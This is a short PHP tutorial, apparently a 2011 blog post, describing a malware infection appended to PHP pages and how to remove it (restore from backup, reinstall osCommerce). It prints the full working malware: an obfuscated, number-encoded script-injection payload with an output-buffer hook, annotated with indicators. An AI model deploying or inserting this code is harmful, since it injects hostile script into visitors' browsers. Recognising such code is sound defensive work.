
Malware: global $ob_starting;

By: Emiley J in PHP Tutorials on 2011年04月04日 [フレーム]

If you see the following code at the end of all your PHP pages, your site has been injected with malware. Follow the steps below to remove it.
<?php global $ob_starting;
// MALWARE SAMPLE -- reproduced so site owners can recognise it; do not deploy.
// Purpose: installs an output-buffer callback that splices an obfuscated
// <script> block into the HTML the site sends to visitors.
// Indicators to search for when auditing files: the identifiers $ob_starting
// and ob_start_flush, and an @ob_start(...) call in a PHP block appended after
// the legitimate end of a file.
// $ob_starting is a run-once guard: the snippet is appended to many files, and
// without the guard a second include would redeclare ob_start_flush().
if(!$ob_starting) {
 // Output-buffer callback registered by the ob_start() call below.
 // $s is the buffered page output; the returned string is what gets sent.
 function ob_start_flush($s) {
	// Substitution table: every payload character is stored as (ASCII code - 32).
	$tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27, 14, 3, 70, 80, 29, 89, 17, 86, 85, 2, 16, 77, 18, 91, 11, 93, 71, 66, 72, 75, 20, 87, 74, 59, 61, 22, 13, 37, 28, 52, 35, 21, 15, 1, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);
	// Payload, stored as a sequence of indexes into $tc so that no readable
	// HTML or JavaScript appears in the file and simple string searches miss it.
	$tr = array(49, 5, 4, 3, 9, 24, 2, 0, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 60, 9, 23, 0, 10, 2, 26, 24, 1, 6, 23, 10, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 8, 25, 25, 30, 29, 14, 15, 1, 23, 9, 14, 1, 15, 30, 8, 0, 34, 0, 0, 0, 28, 18, 3, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 14, 1, 42, 0, 63, 3, 3, 18, 26, 10, 7, 22, 41, 38, 17, 33, 16, 33, 7, 13, 0, 7, 22, 17, 27, 16, 17, 16, 23, 7, 13, 0, 7, 22, 17, 19, 33, 23, 17, 19, 7, 13, 0, 7, 22, 17, 17, 16, 23, 16, 41, 7, 13, 0, 7, 22, 41, 4, 19, 27, 17, 19, 7, 13, 0, 7, 22, 16, 41, 17, 16, 17, 19, 7, 13, 0, 7, 22, 19, 1, 16, 55, 16, 31, 7, 13, 0, 7, 22, 17, 52, 16, 31, 17, 33, 7, 13, 0, 7, 22, 16, 33, 17, 27, 16, 17, 7, 13, 0, 7, 22, 16, 23, 17, 19, 19, 27, 7, 13, 0, 7, 22, 33, 23, 17, 33, 17, 27, 7, 13, 0, 7, 22, 16, 33, 41, 4, 19, 27, 7, 13, 0, 7, 22, 16, 16, 17, 19, 17, 19, 7, 13, 0, 7, 22, 16, 23, 41, 55, 19, 1, 7, 13, 0, 7, 22, 19, 1, 16, 33, 16, 16, 7, 13, 0, 7, 22, 16, 31, 16, 15, 17, 19, 7, 13, 0, 7, 22, 16, 17, 16, 41, 17, 27, 7, 13, 0, 7, 22, 19, 15, 16, 33, 16, 17, 7, 13, 0, 7, 22, 19, 1, 16, 55, 17, 33, 7, 13, 0, 7, 22, 19, 1, 19, 27, 41, 15, 7, 8, 20, 0, 0, 0, 28, 18, 3, 0, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 27, 20, 0, 0, 0, 28, 18, 3, 0, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 0, 25, 0, 31, 20, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 2, 13, 5, 2, 26, 11, 1, 15, 8, 0, 34, 28, 18, 3, 0, 5, 0, 25, 0, 30, 30, 20, 23, 6, 3, 0, 10, 43, 25, 31, 20, 43, 49, 2, 21, 11, 1, 14, 37, 2, 39, 20, 43, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 3, 37, 38, 0, 25, 0, 2, 44, 43, 45, 20, 23, 6, 3, 0, 10, 9, 25, 27, 20, 9, 49, 16, 20, 9, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 4, 11, 3, 0, 25, 0, 4, 12, 3, 37, 38, 21, 5, 29, 38, 5, 2, 3, 10, 9, 35, 35, 13, 33, 8, 20, 9, 23, 0, 10, 4, 12, 4, 11, 3, 54, 25, 30, 31, 31, 30, 8, 0, 5, 0, 35, 25, 0, 64, 2, 3, 9, 14, 37, 21, 23, 3, 6, 32, 51, 39, 18, 3, 51, 6, 15, 
1, 10, 24, 18, 3, 5, 1, 59, 14, 2, 10, 4, 12, 4, 11, 3, 13, 27, 46, 8, 47, 27, 52, 8, 20, 36, 36, 9, 23, 0, 10, 5, 2, 26, 11, 1, 15, 8, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 19, 46, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 33, 8, 8, 20, 36, 0, 1, 11, 5, 1, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 20, 36, 3, 1, 2, 29, 3, 14, 0, 5, 20, 0, 0, 0, 36, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 0, 34, 2, 3, 26, 0, 34, 0, 0, 0, 9, 23, 10, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 56, 26, 59, 15, 0, 57, 57, 0, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 8, 34, 15, 6, 4, 29, 32, 1, 14, 2, 21, 42, 3, 9, 2, 1, 10, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 27, 8, 8, 20, 0, 0, 0, 36, 0, 1, 11, 5, 1, 0, 34, 28, 18, 3, 0, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 25, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 10, 30, 5, 4, 3, 9, 24, 2, 30, 8, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 5, 3, 4, 25, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 31, 8, 20, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 5, 56, 26, 50, 18, 37, 62, 
18, 32, 1, 10, 30, 39, 1, 18, 15, 30, 8, 44, 31, 45, 21, 18, 24, 24, 1, 14, 15, 51, 39, 9, 11, 15, 10, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 8, 20, 36, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 36, 2, 3, 26, 0, 34, 4, 39, 1, 4, 40, 12, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 10, 8, 20, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 5, 1, 2, 50, 9, 32, 1, 6, 29, 2, 10, 30, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 30, 13, 0, 52, 31, 31, 8, 20, 36, 0, 0, 0, 36, 0, 0, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 20, 36, 49, 53, 5, 4, 3, 9, 24, 2, 60);
	// Decode the payload: look each index up in $tc and add 32 back.
	// The decoded string opens with <script type="text/javascript"> and closes
	// with </script>, i.e. an inline script that runs in the visitor's browser.
	$ob_htm = ''; foreach($tr as $tval) {
		$ob_htm .= chr($tc[$tval]+32);
	}
	// Pick the insertion offset on a lower-cased copy so tag matching ignores case.
	// Each test uses truthiness, so a match at offset 0 counts as "not found".
	$slw=strtolower($s);
	// First choice: just after the '>' that closes the first </script tag.
	$i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
	// Fallbacks, tried in order, each only if nothing matched so far.
	if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
	if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
	if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
	if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
	// </body: step back one so the $i++ below lands on '<' (insert before the tag).
	if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
	// No known tag at all: after the $i++ below this becomes the end of the buffer.
	if(!$i){$i=strlen($s);if($i){$i--;}}
	// Splice the decoded script into the response at the chosen offset.
	$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);
	return $s;
 }
 // Set the guard to a non-zero value so later copies of this snippet are skipped.
 $ob_starting = time();
 // Register the callback for the rest of the page output; '@' suppresses any
 // error or warning raised by the call.
 @ob_start("ob_start_flush");
} ?>

Well, to be honest, there is no simple way to remove it. If you are wondering how this happened, you are probably using the osCommerce shopping cart module on your site. The malware gets in through a backdoor opened by a vulnerability in one of the osCommerce scripts.

The best advice I can give is to delete all the folders, including osCommerce, and then copy the files back from a backup. You may be surprised to find that within hours of restoring the old files they are injected with this code again. That happens because the restored copy still contains the vulnerable script (or a backdoor file left by the attacker), so the same entry point is simply used again. If this happens, you will have to uninstall osCommerce completely and reinstall it.

That may be bad news, but that's what many people did to bring their sites back.

